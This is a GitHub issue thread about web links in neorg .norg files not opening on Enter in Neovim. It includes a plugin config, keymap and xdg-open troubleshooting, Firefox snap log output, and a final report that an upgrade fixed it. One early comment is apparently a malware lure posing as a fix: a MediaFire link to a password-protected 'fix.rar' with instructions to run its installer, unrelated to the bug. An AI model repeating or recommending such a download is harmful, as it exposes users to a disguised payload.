### ISSUE TITLE
link doesn't work anymore

### ISSUE THREAD

**Issue by ilan-schemoul** [nvim-neorg/neorg#1564]
### Prerequisites

- [X] I am using the latest stable release of Neovim
- [X] I am using the latest version of the plugin

### Neovim Version

NVIM v0.10.0 Build type: Release LuaJIT 2.1.1713484068

### Neorg setup

```lua
return {
  "nvim-neorg/neorg",
  version = "v9.x.x",
  ft = "norg", -- lazy load on file type
  cmd = "Neorg", -- lazy load on command
  config = function()
    vim.api.nvim_create_autocmd('FileType', {
      pattern = 'norg',
      callback = function (_)
        vim.g.maplocalleader = "g"
      end,
    })
    require("neorg").setup({
      load = {
        ["core.defaults"] = {
          config = {
            disable = {
              "core.esupports.indent",
            },
          },
        },
        ["core.esupports.indent"] = {
          config = {
            format_on_enter = false,
            format_on_escape = false,
          },
        },
        ["core.concealer"] = {},
        ["core.dirman"] = {
          config = {
            workspaces = {
              notes = "~/notes",
            },
            default_workspace = "notes",
          },
        },
        ["core.keybinds"] = {
          config = {
            default_keybinds = true,
          },
        },
      },
    })
    vim.api.nvim_create_autocmd("Filetype", {
      pattern = "norg",
      callback = function()
        vim.keymap.set("i", "<C-b>", "<Plug>(neorg.itero.next-iteration)", { buffer = true })
      end,
    })

    vim.wo.foldlevel = 99
  end,
}

```

### Actual behavior

Enter on `{https://github.com/nvim-neorg/neorg}` (found in the example) => no link opened

### Expected behavior

Open link

### Steps to reproduce

Type enter on `{https://github.com/nvim-neorg/neorg}` (found in the example)

### Help

None

**Comment by max397574** [comment]
is `<cr>` mapped correctly?
because it works for me so it's obviously not neorg being completely broken

try `:nmap <cr>`
it should output something like this
```
n  <CR>        *@<Plug>(neorg.esupports.hop.hop-link)                                                                                                            
                 [neorg] Jump to Link
```

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ilan-schemoul** [comment]
Yes I just checked it's set to hop-link and it works flawlessly for relative link such as {:./www.png:}

**Comment by benlubas** [comment]
@ilan-schemoul This works for me. I suspect it's your operating system causing issues.

Could you provide information about the system you're on?

**Comment by yassinebenarbia** [comment]
Does `<CR>` open a local file work correctly for you? I have a similar issue here  [Can't open file link #1544](https://github.com/nvim-neorg/neorg/issues/1544#issue-2436663238), and if you found them identical can you please mark this a duplicate.

**Comment by ilan-schemoul** [comment]
> Does pressing <CR> to open a local file work correctly for you? I have a similar issue here https://github.com/nvim-neorg/neorg/issues/1544#issue-2436663238, and if you found them identical can you please mention it in your issue message?

Local file works. Example "See also {:/home/ilan/nvim-config/todo.norg:}" I press <CR> file opens

> @ilan-schemoul This works for me. I suspect it's your operating system causing issues.
Could you provide information about the system you're on?

@benlubas 
```
⟩ uname -a
Linux ILTY-401 6.5.0-1025-oem #26-Ubuntu SMP PREEMPT_DYNAMIC Tue Jun 18 1
2:35:22 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
```

**Comment by benlubas** [comment]
Check the xdg-open mime types for links. And make sure that xdg-opening that link from terminal works.

Also want to confirm that this isn't wsl right? It's just a bare metal Linux machine?

**Comment by yassinebenarbia** [comment]
> Local file works. Example "See also {:/home/ilan/nvim-config/todo.norg:}" I press file opens

That does not seem to work for me (using either relative or absolute path), can you share your exact neorg version along with the neovim version. @ilan-schemoul 


> Check the xdg-open mime types for links

After running `xdg-mime query filetype <path>` I get this output `text/plain`

> And make sure that xdg-opening that link from terminal works.

And after running `xdg-open <path>` I get this output `(objectpath '/org/freedesktop/portal/desktop/request/1_22/t',)` @benlubas

**Comment by benlubas** [comment]
I was talking about the http link. Not your issue. These seem like two separate issues.

**Comment by ilan-schemoul** [comment]
> Check the xdg-open mime types for links. And make sure that xdg-opening that link from terminal works.

Yes it works. xdg-open "https://github.com/nvim-neorg/neorg" opens the page on firefox (from an embedded nvim terminal)
{https://github.com/nvim-neorg/neorg} <CR> does not open anything
81ee90c 9.1.1 neorg

**Comment by yassinebenarbia** [comment]
> Yes it works. xdg-open "https://github.com/nvim-neorg/neorg" opens the page on firefox (from an embedded nvim terminal)
> {[https://github.com/nvim-neorg/neorg}](https://github.com/nvim-neorg/neorg%7D) does not open anything

I have the exact same behavior with neorg 9.1.1 ba35900

**Comment by ilan-schemoul** [comment]
Tested again on 0.10.2 and neorg 9.1.1 81ee90c. Still not working type enter {https://github.com/nvim-neorg/neorg}, local links still work.
Ubuntu 22
~ ⟩ uname -a
Linux ILTY-401 6.8.0-48-generic #48~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct  7 11:24:13 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
Bare metal linux
@benlubas @max397574 @vhyrro

**Comment by benlubas** [comment]
If we can't reproduce you have to debug yourself. 

And we can't reproduce.

**Comment by drzhivago420** [comment]
I have the same issue and i've had it for months.

I thought it was a bug with gx because I used to have a bug like that, but I recently realized that gx works flawlessly and it is actually a neorg issue.

Issue ONLY for web links, opening other files, folders, videos or whatever works fine.


NVIM v0.11.0-dev
Build type: RelWithDebInfo
LuaJIT 2.1.1703358377
OS: Kubuntu 24.04.1 LTS x86_64

**Comment by benlubas** [comment]
@drzhivago420 I'll echo what I've already said. 

If you can't provide a reproduction, I cannot possibly debug this myself. You have to put in some work here. I'd start with using a stable version of neovim, and creating a minimal config with only neorg.

Then you can start to add some print statements to the code to see what fails.

Let me know if you need help

**Comment by rorojasq** [comment]
This seems to be the same as https://github.com/neovim/neovim/issues/29932

I reproduced the issue on Ubuntu 24.04 using Neovim v0.10.3 with the following browsers:
- Firefox(snap)
- Chromium(snap)
- Opera(snap)

This is the output from Firefox(snap) when executed from the terminal:
```
Gtk-Message: 16:43:35.221: Not loading module "atk-bridge": The functionality is provided by GTK natively. Please try to not load it.
[115982, Main Thread] WARNING: GTK+ module /snap/firefox/5437/gnome-platform/usr/lib/gtk-2.0/modules/libcanberra-gtk-module.so cannot be loaded.
GTK+ 2.x symbols detected. Using GTK+ 2.x and GTK+ 3 in the same process is not supported.: 'glib warning', file /build/firefox/parts/firefox/build/toolkit/xre/nsSigHandlers.cpp:201

(firefox:115982): Gtk-WARNING **: 16:43:35.263: GTK+ module /snap/firefox/5437/gnome-platform/usr/lib/gtk-2.0/modules/libcanberra-gtk-module.so cannot be loaded.
GTK+ 2.x symbols detected. Using GTK+ 2.x and GTK+ 3 in the same process is not supported.
Gtk-Message: 16:43:35.263: Failed to load module "canberra-gtk-module"
[115982, Main Thread] WARNING: GTK+ module /snap/firefox/5437/gnome-platform/usr/lib/gtk-2.0/modules/libcanberra-gtk-module.so cannot be loaded.
GTK+ 2.x symbols detected. Using GTK+ 2.x and GTK+ 3 in the same process is not supported.: 'glib warning', file /build/firefox/parts/firefox/build/toolkit/xre/nsSigHandlers.cpp:201

(firefox:115982): Gtk-WARNING **: 16:43:35.263: GTK+ module /snap/firefox/5437/gnome-platform/usr/lib/gtk-2.0/modules/libcanberra-gtk-module.so cannot be loaded.
GTK+ 2.x symbols detected. Using GTK+ 2.x and GTK+ 3 in the same process is not supported.
Gtk-Message: 16:43:35.263: Failed to load module "canberra-gtk-module"
```
Chromium(snap) and Opera(snap) have similar warnings.

I tested the following browsers and they work fine:
- Firefox Developer Edition (tarball from the official site)
- Epiphany Browser (from the apt repo)

As a workaround I created a wrapper around `xdg-open` to redirect the output to `/dev/null` and changed neorg to call that wrapper instead.

**Comment by ilan-schemoul** [comment]
it works now norg 9.3 nvim 0.11
go figure
